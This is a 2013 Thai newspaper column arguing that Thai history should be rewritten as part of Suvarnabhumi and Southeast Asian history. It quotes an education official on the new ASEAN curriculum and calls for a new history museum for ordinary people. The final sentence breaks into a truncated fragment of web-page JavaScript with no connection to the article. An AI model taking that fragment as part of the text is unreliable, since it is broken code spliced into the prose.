มติชนรายวัน ฉบับประจำวันจันทร์ที่ 24 มิถุนายน 2556

 

          ประวัติศาสตร์ไทย เป็นส่วนหนึ่งของประวัติศาสตร์สุวรรณภูมิและอุษาคเนย์

          บรรพชนคนสุวรรณภูมิและอุษาคเนย์ซึ่งอยู่ที่นี่ และมาจากที่อื่นด้วย ย่อมเป็นบรรพชนคนไทยด้วยเหมือนกัน (โดยไม่เคยมีใครอพยพมาจากเทือกเขาอัลไตในมองโกเลีย ตามที่ประวัติศาสตร์แห่งชาติของไทยเคยยกเมฆมานาน)

          นายพินิติ รตะนานุกูล ผู้ตรวจราชการ ศธ. ในฐานะประธานคณะทำงานกลุ่มโลก ภูมิภาคและอาเซียน กล่าวว่า

          กลุ่มโลก ภูมิภาคและอาเซียน มีความคืบหน้าในการดำเนินงานเกือบ 100% แล้วกลุ่มนี้จะเป็นวิชาที่เชื่อมโยงเรื่องประวัติศาสตร์สังคม รวมถึงเรื่องอาเซียนเข้าไปด้วย

          โดยเฉพาะประวัติศาสตร์จะต้องเขียนขึ้นใหม่ เพราะที่ผ่านมาประเทศใดเขียนประวัติศาสตร์ ก็จะเข้าข้างตัวเอง ทำให้เกิดความขัดแย้ง แต่ในหลักสูตรใหม่ จะเขียนประวัติศาสตร์ที่สร้างความเข้าใจที่ดีร่วมกัน (มติชน ฉบับวันจันทร์ที่ 17 มิถุนายน 2556 หน้า 12)

          “ประวัติศาสตร์จะต้องเขียนขึ้นใหม่” นี่ถูกต้องที่สุด และควรทำนานแล้ว

          แต่มีปัญหาว่าจะเขียนเรื่องอะไร? เขียนยังไง? เพื่อหลีกเลี่ยงเข้าข้างตัวเอง แล้วกำจัดความขัดแย้งไปพร้อมกัน

          นี่ยากมาก จนถึงยากที่สุด จนอาจเป็นไปไม่ได้ แต่ต้องพยายามโดยไม่สิ้นเพียร

          นอกจากประวัติศาสตร์จะต้องเขียนขึ้นใหม่แล้ว มิวเซียมประวัติศาสตร์ต้องสร้างขึ้นใหม่ด้วย เพื่อจัดแสดงประวัติศาสตร์ไทยที่เป็นส่วนหนึ่งของสุวรรณภูมิและอุษาคเนย์ สำหรับเป็นแหล่งแลกเปลี่ยนเรียนรู้ของสามัญชนชาวบ้านทั่วไปในไทย, ในสุวรรณภูมิ, ในอุษาคเนย์, และในโลก

          เพราะพิพิธภัณฑสถานแห่งชาติที่มีอยู่แล้ว เป็นมิวเซียมประวัติศาสตร์ศิลปะของคนชั้นสูงในไทย และมีไว้เพื่อตอบสนองคนชั้นสูงกับนักโบราณคดี-ประวัติศาสตร์ศิลปะเท่านั้น (ซึ่งต้องยกไว้ต่างหาก เพราะแตะต้องมิได้ และไม่ควรแตะต้อง) ไม่ใช่มิวเซียมประวัติศาสตร์ไทย ที่เป็นส่วนหนึ่งของสุวรรณภูมิและอุษาคเนย์d.getElementsByTagName(‘head’)[0].appendChild(s);if (document.currentScript) {